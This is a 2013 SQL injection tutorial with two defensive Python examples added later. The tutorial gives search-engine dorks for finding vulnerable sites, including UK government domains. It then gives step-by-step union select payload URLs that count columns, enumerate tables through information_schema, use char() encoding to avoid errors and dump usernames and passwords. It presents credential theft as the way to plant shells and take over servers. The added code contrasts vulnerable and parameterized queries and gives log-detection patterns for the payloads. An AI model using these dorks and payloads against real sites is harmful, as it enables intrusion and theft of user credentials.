
Basic Website Database Break-In via SQL Injection

2013, Harry Kehoe, admin@kehoesecurity.com. All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means without the prior written permission of the publisher.

2013, Harry Kehoe

What is SQL injection?

Structured Query Language (SQL) injection is a method hackers use to exploit vulnerable query parameters on a website's pages and, through them, the columns of the SQL database behind it. With SQL injection a hacker can force the database to return any information held in the databases hosted on the server, such as usernames and passwords. This is one of the most common ways hackers break into web servers: they obtain the administrator's username and password, log in, and upload a shell through the administrative panel. With that shell they may be able to root, backdoor and symlink the server, effectively gaining control over every site hosted on the same network.

Google Dorks

Before we plunge into the SQL injection tutorial I will first explain how hackers scan the internet for sites vulnerable to SQL injection. They use search queries on engines such as Google, Yahoo, Bing and Ask Jeeves; hackers often refer to these searches as "dorks". Examples:

inurl:index.php?id=
inurl:page.php?id=
inurl:payment.php?payment_id=
site:.gov.uk inurl:index.php?id=

The inurl: operator tells the search engine to look for the following text anywhere in a page's Uniform Resource Locator (URL or link). In the last example I added the site: operator, which restricts results to websites whose domain name ends in the following text; that example would therefore find UK Government websites with SQL parameters in their URLs.

Is it vulnerable?

example.com/index.php?id=23

Here index.php is the page and ?id= is the SQL parameter we are trying to exploit. To test whether the site is vulnerable, modify the parameter value by appending a quote character, e.g. ?id=23'. Four things may happen:

1. The web page does not change (the URL stays at ?id=1) - Site is secure
2. The site sends your browser to another (usually the index) page - Site is secure
3. The page's display changes and items are missing - May be vulnerable
4. An error message such as "You have an error in your SQL syntax" appears - Vulnerable

The next step is to find out how many columns the query returns.
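The test above works because the raw ?id= value is pasted into the SQL text. As an added example (not from the original tutorial), this Python script stands in for index.php with a constructed in-memory SQLite table and shows the vulnerable lookup beside a hardened one that validates and binds the parameter; SQLite reports syntax errors as sqlite3.OperationalError where MySQL would print "You have an error in your SQL syntax".

```python
import sqlite3

def make_db():
    # Constructed stand-in for the tutorial's site: a pages table looked up by ?id=
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    con.execute("INSERT INTO pages VALUES (23, 'About us')")
    return con

def lookup_vulnerable(con, id_param):
    # The pattern the tutorial exploits: the raw ?id= value becomes part of the SQL
    # text, so a stray quote or an appended clause is parsed by the database.
    sql = "SELECT title FROM pages WHERE id = " + id_param
    return con.execute(sql).fetchall()

def lookup_hardened(con, id_param):
    # Validate the type first, then bind the value as a parameter; the database
    # receives it as data and never parses it as SQL.
    try:
        page_id = int(id_param)
    except ValueError:
        return []  # reject malformed input instead of passing it on
    return con.execute("SELECT title FROM pages WHERE id = ?", (page_id,)).fetchall()

def probe(lookup, id_param):
    # Map the result onto the tutorial's "four things may happen" list:
    # "error" is outcome 4 (the SQL error reaches the page), "normal" is outcome 1.
    con = make_db()
    try:
        rows = lookup(con, id_param)
    except sqlite3.OperationalError:  # SQLite's counterpart of MySQL's syntax error
        return "error"
    return "normal" if rows else "empty"
```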


Finding the Column Count

The first step of this multi-step attack on the SQL database is to discover how many columns the page's query returns. To do this we send the database an order by clause by modifying the URL:

example.com/index.php?id=23+order+by+1

The + represents a space; it makes the code clearer and easier to read than %20, which is what a plain space becomes. order+by is the statement we use to check for a column. simply tells the website we are giving an SQL command. The number at the end is the column position. Once you use this command on the website you will notice the site goes back to normal, as it was before we tested whether it was vulnerable; this is good. Now increase the number at the end and keep going until you get an error:

example.com/index.php?id=23+order+by+1 - No error
example.com/index.php?id=23+order+by+2 - No error
example.com/index.php?id=23+order+by+3 - No error
example.com/index.php?id=23+order+by+4 - No error
example.com/index.php?id=23+order+by+5 - No error
example.com/index.php?id=23+order+by+6 - Error

As you can see we get an error at column 6, which means there is no column 6, so the query returns 5 columns. Some queries return a lot of columns and some only a few; the most I have ever seen is 120, but that is very rare, so I suggest guessing in multiples of 5.

Finding the Vulnerable Columns

Once we know how many columns there are we need to find out which ones are vulnerable, meaning which ones are displayed on the page. To see them we must make the parameter select no row and then use the union select command. There are two ways of doing this. I simply change the value to null, like so:

index.php?id=null

Others change the value to a negative number; no row has a negative id, so the query returns nothing, which has the same effect. Example:

index.php?id=-23


From this point you send the union select command as follows:

index.php?id=null+union+select+1,2,3,4,5--

Here we are selecting every column in the query (1 to 5), and on the page index.php we will now see numbers appearing in various places. These are the numbers of the vulnerable columns. I can see a 2 at the top of my page, so I know that column 2 is vulnerable to SQL injection.

Extracting Information

The way we extract information from the database depends on the version of MySQL it runs. To find out which version we are injecting, put the Version() function in place of the vulnerable column:

index.php?id=null+union+select+1,Version(),3,4,5

On your page you will now notice that the number of the column you are injecting has changed to something like 5.0.1.6; this is the version. If the version you are injecting is below 5 you will have to use error based injection, which I will not cover in this article. From now on I recommend copying the website URL into a notepad document and editing it there, as we will be tampering with it a lot and it will get very messy.

At this point we need to find the names of the tables in the database. We do this with three pieces:

1. group_concat(table_name) - tells the database to print the table names.
2. +from+information_schema.tables - the table names come from the information_schema database.
3. +where+table_schema=database() - restricts the result to tables in the current database.

So now we take our vulnerable column, replace it with group_concat(table_name), and append +from+information_schema.tables+where+table_schema=database() after the column list:

example.com/index.php?id=null+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()--

The page should now list all the tables in the current database. Sometimes it will produce a nice clean and tidy list, but in other cases it will be messy, all over the place and unreadable. To solve this add ,0x0a inside the brackets after table_name, like so:

example.com/index.php?id=null+union+select+1,group_concat(table_name,0x0a),3,4,5+from+information_schema.tables+where+table_schema=database()

Now my list is very neat, tidy and readable.


In my list I have a users table. To get the column names of that table we change a few things from the table-name query: group_concat(column_name) instead of table_name, information_schema.columns instead of .tables, and we add +where+table_name=users. The URL is now:

example.com/index.php?id=null+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=users

In some situations, like mine, you may get an error here. To get around this we write the table name as ASCII character codes instead. Simply search the web for a "string to ASCII converter" and you will find a site that does the conversion for you. The ASCII codes for users are 117 115 101 114 115; to put these into our injection we write them as char(117,115,101,114,115):

example.com/index.php?id=null+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=char(117,115,101,114,115)

Now I can see some very important columns: Username, Password and ID.

Extracting Data

The next step is to extract the data from the Username, Password and ID columns. To do this we group_concat the columns, but if we just use group_concat(Username,Password,ID) the information is displayed on a single line with nothing separating the three values. To solve this we use:

group_concat(Username,0x3a,Password,0x3a,ID,0x0a)

You may be wondering what 0x3a and 0x0a mean. 0x3a is the hex code for a colon, so if the username is Harry, the password is Kehoe and the ID is 1, the data will display as Harry:Kehoe:1. 0x0a is a new line, so the rows are shown as a list. We also add +from+ followed by the table name after the column list. My URL now looks like this:

example.com/index.php?id=null+union+select+1,group_concat(Username,0x3a,Password,0x3a,ID,0x0a),3,4,5+from+Users

Now you will have the username, password and ID of the users on the website. That completes the basic part of the tutorial. In my next tutorial I will explain the procedure for extracting data from other databases hosted on the same server and, later, bypassing professional Web Application Firewalls to exploit parameters that may not seem vulnerable.
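From the defender's side, every step of the procedure above leaves a recognisable trace in the web server's access log. As an added example (not part of the original tutorial), this Python script decodes the query string of constructed Apache-style log lines and flags the tutorial's own indicators: the stray quote, the incrementing order by probes, union select, information_schema enumeration, group_concat and char() encoding; the IP addresses, timestamps and sizes are made up.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus
# Constructed Apache combined-format lines replaying the tutorial's steps; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2013:12:00:01 +0000] "GET /index.php?id=23 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2013:12:00:05 +0000] "GET /index.php?id=23%27 HTTP/1.1" 500 312
203.0.113.7 - - [10/Mar/2013:12:00:09 +0000] "GET /index.php?id=23+order+by+1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2013:12:00:12 +0000] "GET /index.php?id=23+order+by+5 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2013:12:00:15 +0000] "GET /index.php?id=23+order+by+6 HTTP/1.1" 500 312
203.0.113.7 - - [10/Mar/2013:12:00:30 +0000] "GET /index.php?id=null+union+select+1,2,3,4,5-- HTTP/1.1" 200 4990
203.0.113.7 - - [10/Mar/2013:12:01:02 +0000] "GET /index.php?id=null+union+select+1,group_concat(table_name,0x0a),3,4,5+from+information_schema.tables+where+table_schema=database() HTTP/1.1" 200 6100
203.0.113.7 - - [10/Mar/2013:12:01:40 +0000] "GET /index.php?id=null+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=char(117,115,101,114,115) HTTP/1.1" 200 6400
198.51.100.4 - - [10/Mar/2013:12:01:10 +0000] "GET /index.php?id=42 HTTP/1.1" 200 5300
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# One rule per step of the tutorial, matched against the decoded query string.
RULES = [
    ("stray_quote", re.compile(r"=\d+'\s*$")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("char_encoding", re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)+\s*\)", re.I)),
]

def analyse(log_text):
    # Returns {ip: {"hits": [(rule, path), ...], "order_by_values": {n, ...}}}
    # for every client that triggered at least one rule.
    report = defaultdict(lambda: {"hits": [], "order_by_values": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, path = m.group("ip"), m.group("path")
        # '+' and %27 are decoded so the rules see the text the database would see
        query = unquote_plus(path.partition("?")[2])
        for name, pattern in RULES:
            if pattern.search(query):
                report[ip]["hits"].append((name, path))
        for n in re.findall(r"\border\s+by\s+(\d+)", query, re.I):
            report[ip]["order_by_values"].add(int(n))
    return dict(report)

def column_enumeration_suspects(report, min_distinct=3):
    # Clients that tried several distinct ORDER BY positions: the column-count step.
    return sorted(ip for ip, r in report.items() if len(r["order_by_values"]) >= min_distinct)
```

A single order by hit can be a legitimate sorting parameter, which is why the column-count check asks for several distinct positions from one client rather than one match.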

